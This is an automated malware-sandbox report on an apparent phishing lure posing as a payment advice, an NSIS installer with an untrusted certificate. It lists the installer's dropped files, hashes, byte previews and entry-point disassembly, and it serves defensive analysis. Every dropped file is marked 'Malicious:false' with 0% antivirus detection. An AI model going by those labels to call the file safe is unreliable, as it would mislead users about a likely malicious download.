                SHA-512:7E4EC58DA8335E43A4542E0F6E05FA2D15393E83634BE973AA3E758A870577BA0BA136F6E831907C4B30D587B8E6EEAFA2A4B8142F49714101BA50ECC294DDB0
                Malicious:false
                Preview:........................................user.
                Process:C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                Category:dropped
                Size (bytes):34016
                Entropy (8bit):6.1021284380541925
                Encrypted:false
                SSDEEP:384:JP7a6wQdSCVWSdoEdXjYmxzfkfIwuWR7UPMEdxsTStsBdMQJK2wKucYkcuhV3:N7a6eiHdFdr7W5UPMgy+OBG2X90uhV3
                MD5:4FC7FC174E80C178225C2509027DF961
                SHA1:9FF62413EC0DD462F5F016EBC804F1D736D24796
                SHA-256:866B31DD39B97DEDAFD0FBD5672639EE91B47AD319C47816B4F6D01BFF93FF8C
                SHA-512:29261B9ABC4AF2F51C05B61A37721BC737B411530361A4B48A7BFFAB0F8263EA75BFD51B6E6E94E91E1D02DC442B534C3334B05FD8324E7CF307FA08179A1ED9
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Z.oPZ.oPZ.oPS..PR.oP..nQX.oP..jQK.oP..kQR.oP..lQX.oP).nQY.oPZ.nPt.oP..fQY.oP..oQ[.oP..P[.oPZ..P[.oP..mQ[.oPRichZ.oP........PE..d....5;a.........." .....0...:.......................................................F....`..........................................\.......]..........H............f..........H....O..p...........................@P...............@..p............................text............0.................. ..`.rdata...#...@...$...4..............@..@.data...@....p.......X..............@....pdata...............Z..............@..@.rsrc...H............^..............@..@.reloc..H............d..............@..B................................................................................................................................................................................................................................................
                Process:C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
                File Type:data
                Category:dropped
                Size (bytes):295288
                Entropy (8bit):6.745618664148764
                Encrypted:false
                SSDEEP:3072:x+/xc6g1BpoF5SmRfY+uynGbbqwHzp8d7fMUMQpnf+Dk64qR/2sE4GjEZQ2CfDU4:MkpGQqruyGqIzgsG5Nq/uC4fQzbEI2
                MD5:4D698E219A6C687613078B94085D51FE
                SHA1:52A9BD9EF707F72A14006D4FDA0989F11A5616B9
                SHA-256:5E0F6244C6A33528CFCEC4C23F45F6238EA57818484B602086D26562F498EF49
                SHA-512:02E934B3374EE1CF9195FC7C329D0F4AC4A8DFBB081CDD04F4D76CF5EA92353507B34EAC099A5161CCD36BF11048FA3588A4D7F029FE585979A1D3E3C93E150B
                Malicious:false
                Preview:.......j...........<.........&&...........D.\\\\.......#.........+....C..................>...R.....yy........................bb.............$................... ..........................IIII.......PPP............'......T..TTT...77..ww...........\....0..J......................~..........................`................................s............;;...NN.................L..........................((..................aaaa..............5...KKKKKKKKK.j...{...u................55.s......>..w............W...................................2..........AA.....f............J..................../...S...............<.(.............cccc..AA...JJ.N.......TT......................~.......-.............m......0000....&...t..U.OO......................WW..................................&......................................66..................VVV....J..44.//...........\\..._...x.O.............................ff.................................y.........BBB....zz.....444................................
                Process:C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
                File Type:data
                Category:dropped
                Size (bytes):35747
                Entropy (8bit):4.582392134953922
                Encrypted:false
                SSDEEP:384:x0ApQpUO7nJ9BGe8Gd+zZcrpqHCuY4TIm+io9fUe4KgZzZxrj2V+QRf4TGf:FypbJrGernrspY4s9fUKgpZxrahgTGf
                MD5:69FFEE981CA33B2B99A58323AE19A198
                SHA1:C9B1C33C92AE9BAE354B11A9F8F09639B7A8D493
                SHA-256:6623E3157B8615EBC31FE362C9058FFA9682A033822ED7A5E965A086D5F069A3
                SHA-512:ED48BD96F3D65CA8F3BDBDBEFDF2F40A29468326436D28E4F9B58FF3A7EFB06197525D55777277719270864AA7D5301F3E3478C86E944D3AD054542DA94084A4
                Malicious:false
                Preview:...................ddd.................??....::::..........................mmm.......33..................................HH.B.......................t...............\.,,./.................^...........Q.....................M.==...............;..........................................BBBB..........E..........1...666.f....hhh.........RRR.......+++..f......=...............:.......e........FF......R.TT............www..........:...........H.|........#...w..........."..tt....`..+++...77..............t........}...........................FF...........MM...........&&.99..............F......\\......................................|..............................W.......................ee.q.-...<<.........f.........6........9.qqq......I..............88.........P........hh.........!!!.\.0.............................................D....&.===.]]].....w..................7......uuu.......w...}.......%...................................v.......w......]]...............w.d......................VV......c.
                Process:C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
                File Type:SVG Scalable Vector Graphics image
                Category:dropped
                Size (bytes):266
                Entropy (8bit):4.986245244009802
                Encrypted:false
                SSDEEP:6:tI9mc4slzc8SRIKMNo/aMhFl1OkUjq5eKVrGDVfqKlNK+:t4C8LKMuyMhPobjoprGDRlj
                MD5:8B727826F9D8C0C7C954EDE912CB0DEB
                SHA1:1518AA80747326B5353C22D32E57A33D61285119
                SHA-256:0783A7F518D3879C8F0F50B45FBD779A98652469E9B7C659CE41F14D1629D334
                SHA-512:0ABB243F9D1E0B6EDA0CB25D35C3449AB2B5B83078208F11B876A27FF11FF70B79F8BA97D4DA3AED21A8314C75FB2174D9378AF59B57DCB99DFF681D9AAB8561
                Malicious:false
                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16">. <path d="M8 1a3 3 0 100 6 3 3 0 000-6zM6.5 8A4.49 4.49 0 002 12.5V14c0 1 1 1 1 1h10s1 0 1-1v-1.5A4.49 4.49 0 009.5 8z" style="marker:none" color="#bebebe" overflow="visible" fill="#2e3436"/>.</svg>.
                Process:C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
                File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                Category:dropped
                Size (bytes):12193
                Entropy (8bit):4.4720152705808935
                Encrypted:false
                SSDEEP:192:i2PDEeaNB1PmcptkcDHxbTvPnc67bMxQxGx4ch/JuLQRcg/oN96bPNljYiYr197:ikDFKBFmcPLx3HPnIsqrJuqcgAN96b87
                MD5:3C21135144AC7452E7DB66F0214F9D68
                SHA1:B1EC0589D769EAB5E4E8F0F8C21B157EF5EBB47D
                SHA-256:D095879B8BBC67A1C9875C5E9896942BACF730BD76155C06105544408068C59E
                SHA-512:0446A0E2570A1F360FD8700FD4C869C7E2DBB9476BBDEC2526A53844074C79691542B91455343C50941B8A6D5E02A58EE6AA539CC4C4AE9CF000B4034EF663E2
                Malicious:false
                Preview:.;!@Lang2@!UTF-8!..; : Kirill Gulyakevitch..; 9.07 : 2011-03-15 : Drive DRKA..;..;..;..;..;..;..;..;..;..0..7-Zip..Belarusian..............401..OK................&.....&....&......................&............440..... ... &........ ... .&.......................&.......&.. ....... ......&......... ......... ........ ....... .......... ........?..500..&......&........&........&..........&.......&.........540..&................ &................... .&................&................&.........&......... ......&........... ......&............&..... ..........&.'...... .............&...........&................. ......Diff..&........ .
                Process:C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
                File Type:SVG Scalable Vector Graphics image
                Category:dropped
                Size (bytes):998
                Entropy (8bit):5.186938379246791
                Encrypted:false
                SSDEEP:24:t4CBGD0QNRWLLxo2em0yKbRAecFxV0/wXK:gDrc0NtAecFiH
                MD5:CB1EEE7BDB582B756D0F68EF02D6D96D
                SHA1:9E9B0F25BC472EF1C1C13EEAC12FD11C4CC0D2D9
                SHA-256:20EA767E852A8EBF2C5BA16D56CBAE10BD09D6CBA89B372A57EAA973AD3281B4
                SHA-512:E22FAEAE78D244A0F4E7215B31125D5AA4FD66C0720B0DE61D12084EAB879D7A9E231CCD5CD431417115B0945B450DC348DA400D67DB1898513B7BD6B9C274DB
                Malicious:false
                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g color="#bebebe" fill="#474747"><path d="M3 9h10c.554 0 1 .446 1 1v3c0 .554-.446 1-1 1H3c-.554 0-1-.446-1-1v-3c0-.554.446-1 1-1z" style="marker:none" overflow="visible"/><path d="M7 0s-.709-.014-1.447.356C4.814.725 4 1.666 4 3v3h2V3c0-.667.186-.725.447-.855C6.71 2.014 7 2 7 2h2s.291.014.553.145c.261.13.447.188.447.855v8h2V3c0-1.333-.814-2.275-1.553-2.644C9.71-.014 9 0 9 0z" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;shape-padding:0;isolation:auto;mix-blend-mode:normal;marker:none" font-weight="400" font-family="sans-serif" overflow="visible"/><path d="M2 12h12v4H2z" style="marker:none" overflow="visible"/></g></svg>
                Process:C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
                File Type:HTML document, ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):1245
                Entropy (8bit):5.462849750105637
                Encrypted:false
                SSDEEP:24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
                MD5:5343C1A8B203C162A3BF3870D9F50FD4
                SHA1:04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
                SHA-256:DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
                SHA-512:E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
                Malicious:false
                Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co
                Process:C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                Category:dropped
                Size (bytes):555
                Entropy (8bit):7.499536740374189
                Encrypted:false
                SSDEEP:12:6v/7anZhFxDEKwjAq0kaO/yvSL6T1pjNngLpzPanwmB9HE4JqSjF:5bDEPxdqKLmpqLdynw29kEqSZ
                MD5:BFF011148B773FA44B9A9BB029E8CC52
                SHA1:F2B838927E320D12649CEFDEA3AFE383C6650D7C
                SHA-256:B21DE7B432A7A67544D007ECC0FDD95F8E8C6129AF558A32102EE04C08635653
                SHA-512:A57C83AEE0E1F4C530D2F5B90589C31FD6E2FF8F62F998963284218FAC5EE164BCA7A619A9597DC3E2ECD0095A2CF04467E89EDF86700E1A90B3DF60B5121C9B
                Malicious:false
                Preview:.PNG........IHDR................a....IDATx......A....v...b.m.A..Q..Q..UD5.F.m.....fs{9.}...V.`....%.kt....R...+%7.}p..@.}:..u466`.6uu.tvv...N6....D"Q......po".;.4....W..g.b..\.~?...<.../.....$..5....................r.+..ah...F;.H.`b ....4.[...k.6.<..Kk.m[h..x`...R...z{.H.......Oax.e..{.........w._...c._>..6..T*HY.1! e.#....G......{.AB..l.K"..P(..j..$.R.}L.5.....@.>.......X...hE....L.."L.....=~..7n.2.,RJ.01.....B.AWW..<q......Ng.,../.Z...+...N].r.5.EB.p$..!,....,......SW.TD+U...K...ee._.N*.[..`..1q..v\#6..?;7..4..3....IEND.B`.
                Process:C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
                File Type:SVG Scalable Vector Graphics image
                Category:dropped
                Size (bytes):680
                Entropy (8bit):5.109191824773878
                Encrypted:false
                SSDEEP:12:t4CP5GEA9xI7jhz4AeW02KdTwWjhz4AeW02KdTPqkoop4p:t4CBGEAgF4AeW0/N4AeW0/Zqg4p
                MD5:379690952AAA576521D51249D404CBCD
                SHA1:61A8A95B0454422AA47379CF983B99FFDD839439
                SHA-256:EAD402FB0B85DB153356EC695016FD4F2C4031367D8ED6D1C1EF5FF4F28A8DE8
                SHA-512:35B6BC866C3D02A2486D3447C82405103DE89D46940F7FE44A7009E714BBA57FBE601EEC939C3206ADB06FB31C4FD1D3822A0ED52A346ACFDE5908643432F928
                Malicious:false
                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g color="#000" fill="#474747"><path d="M13 5v2h1v5H4v2h12V5z" style="line-height:normal;-inkscape-font-specification:Sans;text-indent:0;text-align:start;text-decoration-line:none;text-transform:none;marker:none" font-weight="400" font-family="Sans" overflow="visible"/><path d="M0 2v9h12V2zm2 2h8v5H2z" style="line-height:normal;-inkscape-font-specification:Sans;text-indent:0;text-align:start;text-decoration-line:none;text-transform:none;marker:none" font-weight="400" font-family="Sans" overflow="visible"/><path d="M3 7c2.32 1 3.045-1.66 6 0v1H3z" style="marker:none" overflow="visible" opacity=".35"/></g></svg>
                Process:C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                Category:dropped
                Size (bytes):220
                Entropy (8bit):6.546211943247282
                Encrypted:false
                SSDEEP:6:6v/lhPysde0C1jngP3V95D2tOA/RDvhpLUxbVp:6v/7jC1zi3Sr/hW
                MD5:C84EE7522C124892455BB09DEBCF9340
                SHA1:AF87A2A5688346A3902762DD250328B7EF224620
                SHA-256:E0A3BD6FE1A1BAEFFE04BCA2980ADF755F888E31DCE3686B16C5DAC4202A38C8
                SHA-512:3BEED79366F15CD075781F677C0C9E84081D2189D1FB541A34AA25980B48701A3D93DC550E4ABEB550EFBE3167B1CAB8338E22F4603C6A71936876FBA75FAD58
                Malicious:false
                Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8...=..P.../z.Q..Kx....l.b. )...x........t.......Y~.)......7......W.xk.'A...u.........%..!k.k5.|E=+X..,,a.S.H4p*D8.8(FH.a..5.x...%.....7..8s:.......IEND.B`.
                Process:C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                Category:dropped
                Size (bytes):144
                Entropy (8bit):5.708279548998072
                Encrypted:false
                SSDEEP:3:yionv//thPl9vt3lAnsrtxBllAoSF1/LvgStjP9f9uvJYUo+/JHt//sup:6v/lhPysKo21/Lvlt7V9+YUouJH1/jp
                MD5:1ED278AD206D6EA33FF787DD326E0FC5
                SHA1:8CFF7AD12FC0E5545E71D05879A0245BEDAF4D46
                SHA-256:CC88E76F7C7D2E5B07E49D1F2AD88F8BAFC0542EB11CEB2B2FFF235C87AB4417
                SHA-512:7291085B6153C02EDBF679CDDB93B97DBB74943F216EB622CE9722E02613269F626F8A7A5BE8DA683153E9AEE22C40ED7264E8A0ED62A99F477E2B96642596BF
                Malicious:false
                Preview:.PNG........IHDR................a....sBIT....|.d....GIDAT8.c`..0...O.Z&J]0.. ...&u]..5?......b....Q.E./.....t@..,....)1..,b...#.=....IEND.B`.
                Process:C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                Category:dropped
                Size (bytes):140
                Entropy (8bit):5.529383944212929
                Encrypted:false
                SSDEEP:3:yionv//thPl9vt3lAnsrtxBllDM9vFW0p/sXm1MMos9DwlTYTbklt/sbp:6v/lhPysx8vFW0pkX4iZlTYTI3Ebp
                MD5:4308BBBAB1DB146494AE5ABB07B8E6DB
                SHA1:58121574EEB070E26DDD75A964F3548E176E58A4
                SHA-256:EFB732049C674EB25BFCB2FA0CBCC45D24190BF1479C054647F424B31E34C828
                SHA-512:41C9B37516F8D6AB7155F890EE36C26FE4161383A93BFBF696AB18292774C3556642E898361D21CECCBFEFFAF5814495CFAC2C74791E02F068B055BD3AD87DE4
                Malicious:false
                Preview:.PNG........IHDR................a....sBIT....|.d....CIDAT8.c`.J..R..(...\.`..2.Y3...k.i......b..PN.....J.@6.l.`.Pd..A.....O...D....IEND.B`.
                Process:C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                Category:dropped
                Size (bytes):147
                Entropy (8bit):5.834297280344084
                Encrypted:false
                SSDEEP:3:yionv//thPl9vt3lAnsrtxBllPhF1MzoQxJrN7djpdXLImeR/mV2kg1p:6v/lhPysx1MzoQxlRZbCRaip
                MD5:38D787F55E22FB591135F9250CD259D4
                SHA1:0E135B0E1CA49A6E43DB4CB7596FAEA022E23924
                SHA-256:1ED839B015A67CAB9948469975411D982A96314CE82851EA2F9F6BB8D733A002
                SHA-512:4E21AB54B7110B4CD2EBC0E2CF6DF3F8C7C988495BCCA76949BC3C5EB669A793FCCDA5CB4DDB7B627A21734BD181FE44670757144CC2A007FCB695405F08EC2B
                Malicious:false
                Preview:.PNG........IHDR................a....sBIT....|.d....JIDAT8.c`..0b..O..&J]@5....tR.>........`.8.(6....-Z....a..&..3 ....4...<.............IEND.B`.
                Process:C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
                File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                Category:dropped
                Size (bytes):9515
                Entropy (8bit):5.04214621707661
                Encrypted:false
                SSDEEP:192:icoGT04mzNN8hYivh5gtE/PkjY09fdNQuQ:ibGg4mzNhi4tEHoDfHQuQ
                MD5:7B02E1AE16E2E709D7C97DE560B4DBE9
                SHA1:191A54644417F7D36F5CB4182DCDB3737D74BE51
                SHA-256:DA0B58F52BBC131F967942D1D8E9DE1B5721AE864BC21852A0AD4062332297CB
                SHA-512:4F689F854DB3F766B5E53CE2F19E9F8293C075EE3F9B18098EB05B352F2EC95DF85E49A78540781EB531BCE60C7B1F7890F1FE3C65200DEC3CB908E90FB827A1
                Malicious:false
                Preview:.;!@Lang2@!UTF-8!..; : Francisco Jr..; 4.37 : Fabricio Biazzotto ..; 18.05 : Atualizado por Felipe..;..;..;..;..;..;..;..;..0..7-Zip..Portuguese Brazilian..Portugu.s Brasileiro..401..OK..Cancelar........&Sim..&N.o..&Fechar..Ajuda....&Continuar..440..Sim pra &Todos..N.o pra T&odos..Parar..Reiniciar..&Em 2. plano..&Em 1. plano..&Pausar..Pausado..Voc. tem certeza que voc. quer cancelar?..500..&Arquivo..&Editar..&Visualizar..F&avoritos..&Ferramentas..&Ajuda..540..&Abrir..Abrir &por Dentro..Abrir p&or Fora..&Visualizar..&Editar..Re&nomear..&Copiar Para.....&Mover Para.....&Apagar..&Dividir arquivo.....Com&binar arquivos.....P&ropriedades..Comen&t.rio..Calcular checksum..Diff..Criar Pasta..Criar Arquivo..S&air..Link..&Correntes Alternantes..600..Selecionar &Tudo..Desmarcar Tudo..&Inverter Sele..o..Selecionar.....Desmarcar.....Selecionar por Tipo..Desfazer sele..o por Tipo..700...co&nes Grandes...c&ones Pequenos..&Lista..&Detalhes..730..Desorganizado..Visualiza..o
                Process:C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
                File Type:PNG image data, 600 x 600, 8-bit/color RGBA, non-interlaced
                Category:dropped
                Size (bytes):16669
                Entropy (8bit):7.836876926418697
                Encrypted:false
                SSDEEP:384:dg1Ew+1FT+/6trrKWzge5jh2xmalhctpNy:W1E1c6tru1CUYa4tDy
                MD5:F80867A421C85C6E2865CF85FF7C4B02
                SHA1:C3EAB6B7E92646FE3407B2B3C5AFFE13A7873C48
                SHA-256:BCAA3B1333919176137D4DE4B1E3F31126159B12F959D7277BD8537B95139BD3
                SHA-512:06B51E660AEE86FC3BB068C6DEA046920E04F86B8EDD02E640EAC619F0F0D7E87E5CAE5BE1390CEBC5DFE70AA13BAB1710176E88C9D1C859182629D429745D78
                Malicious:false
                Preview:.PNG........IHDR...X...X......f......tEXtSoftware.Adobe ImageReadyq.e<..@.IDATx.....\.}..../...].{`.......D.\..u......#..V.eW.G>"W....V..d..IVU".:.D<$J.....{q/.....`0g./..z....A.`..?..p....M......._.'...L...]~.....;.........,..... ....X.....@`.. ..........@`...,..... ....X.....@`.. ..........@`...,..........X.....@`.. ..........@`...,..........X......... ..........@`...,..........X......... ..........@`...,..........X......... ..........@`...,..........X......... ..........@`...,..........X......... ..........@`...,..........X...,..... ..........@`...,..........X...,..... ....~.....N...@...C{..o.?2.....x...?_....sC..O8...n..J.ttbv9...w~...ym..O.......vq"f..qrjt9... ..].S..Hz.gf}.,.Sm!...>..Xh..:S.};d.....2..?.......2...1..ep...K.{.?..@`.7=...7U..C......S...6....|a.}].._..d....,_.........+__..JS.....X.u...;..Q.x.z9...eP5f.H..nnz.&h...4.kz......&....o)..=..x.=...y ....6i...wL.....Y(.2NRP..J...HL/K#^izqpbUp}...q...g.......".....4R..#.VFrR|.LF>w~.Pm..\..4.5t{.-..
                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                Entropy (8bit):7.556713515266732
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:ePAY-Advice_Rf[UC7749879100].exe
                File size:329072
                MD5:06bf8620598b674fc3506a2844d42d65
                SHA1:00e28bd96e338f7bfff9c41d985de05f010d8ea7
                SHA256:98883d7d2678fd8cbdad8b8c1ca7cf13a797b1074f081dee24aba14dcc346ffe
                SHA512:d1e49bf22a28b2521f5ddfe4e0da6a40ebd599a3284f9d25b791e0ded05918e615ed4d65fe5d49c588fcc61e05cd2a80374ebfe94ceed972e5490d255f28dae7
                SSDEEP:6144:iDk/kgv+gAz2TU8tpVy+cofgwCNW8J++jMJnq2UroIbvt:ztD42TU8DdcjNFJgJnqbrh1
                TLSH:4C64F14176A1C823FD6A4630CD91E5F3E1BAFE04C828D10773A13FAFB9352858555EBA
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L...+.oZ.................`.........
                Icon Hash:08c2b0d8cc64b046
                Entrypoint:0x4031d6
                Entrypoint Section:.text
                Digitally signed:true
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Time Stamp:0x5A6FED2B [Tue Jan 30 03:57:31 2018 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:3abe302b6d9a1256e6a915429af4ffd2
                Signature Valid:false
                Signature Issuer:E=spinulation@Johnsen.fo, OU="Releaser Regionplanlov Ellwood ", O=Blodkrftens, L=Fleuriel, S=Auvergne-Rh\xf4ne-Alpes, C=FR
                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                Error Number:-2146762487
                Not Before, Not After
                • 09/09/2022 09:19:43 08/09/2025 09:19:43
                Subject Chain
                • E=spinulation@Johnsen.fo, OU="Releaser Regionplanlov Ellwood ", O=Blodkrftens, L=Fleuriel, S=Auvergne-Rh\xf4ne-Alpes, C=FR
                Version:3
                Thumbprint MD5:E72625F2F2E4D81D13EEADD636799AE5
                Thumbprint SHA-1:96AB23C902D117D7E57A617EE5CD324FD5CFB328
                Thumbprint SHA-256:4DD00D1164E5A3B45C21C6B0ACA7CDE02DF5C70EBD4F95F3736AD2784DC2D5E4
                Serial:16E55C1D2183D78DF9C4B28EDF378EDD20F08352
                Instruction
                sub esp, 00000184h
                push ebx
                push esi
                push edi
                xor ebx, ebx
                push 00008001h
                mov dword ptr [esp+18h], ebx
                mov dword ptr [esp+10h], 00409198h
                mov dword ptr [esp+20h], ebx
                mov byte ptr [esp+14h], 00000020h
                call dword ptr [004070A0h]
                call dword ptr [0040709Ch]
                and eax, BFFFFFFFh
                cmp ax, 00000006h
                mov dword ptr [0042370Ch], eax
                je 00007F70B040A013h
                push ebx
                call 00007F70B040D0EAh
                cmp eax, ebx
                je 00007F70B040A009h
                push 00000C00h
                call eax
                mov esi, 00407298h
                push esi
                call 00007F70B040D066h
                push esi
                call dword ptr [00407098h]
                lea esi, dword ptr [esi+eax+01h]
                cmp byte ptr [esi], bl
                jne 00007F70B0409FEDh
                push 0000000Ah
                call 00007F70B040D0BEh
                push 00000008h
                call 00007F70B040D0B7h
                push 00000006h
                mov dword ptr [00423704h], eax
                call 00007F70B040D0ABh
                cmp eax, ebx
                je 00007F70B040A011h
                push 0000001Eh
                call eax
                test eax, eax
                je 00007F70B040A009h
                or byte ptr [0042370Fh], 00000040h
                push ebp
                call dword ptr [00407044h]
                push ebx
                call dword ptr [00407288h]
                mov dword ptr [004237D8h], eax
                push ebx
                lea eax, dword ptr [esp+38h]
                push 00000160h
                push eax
                push ebx
                push 0041ECC8h
                call dword ptr [00407178h]
                push 00409188h
                Programming Language:
                • [EXP] VC++ 6.0 SP5 build 8804
                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x74280xa0.rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x360000xa3c0.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x4fb500xa20
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x5f0d0x6000False0.6649169921875data6.450520423955375IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rdata0x70000x12480x1400False0.4275390625data5.007650149182371IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data0x90000x1a8180x400False0.6376953125data5.129587811765307IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .ndata0x240000x120000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc0x360000xa3c00xa400False0.0760766006097561data1.8822021165260459IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                NameRVASizeTypeLanguageCountry
                RT_BITMAP0x362680x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States
                RT_ICON0x365d00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 0EnglishUnited States
                RT_DIALOG0x3fa780x144dataEnglishUnited States
                RT_DIALOG0x3fbc00x13cdataEnglishUnited States
                RT_DIALOG0x3fd000x120dataEnglishUnited States
                RT_DIALOG0x3fe200x11cdataEnglishUnited States
                RT_DIALOG0x3ff400xc4dataEnglishUnited States
                RT_DIALOG0x400080x60dataEnglishUnited States
                RT_GROUP_ICON0x400680x14dataEnglishUnited States
                RT_MANIFEST0x400800x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States
                DLLImport
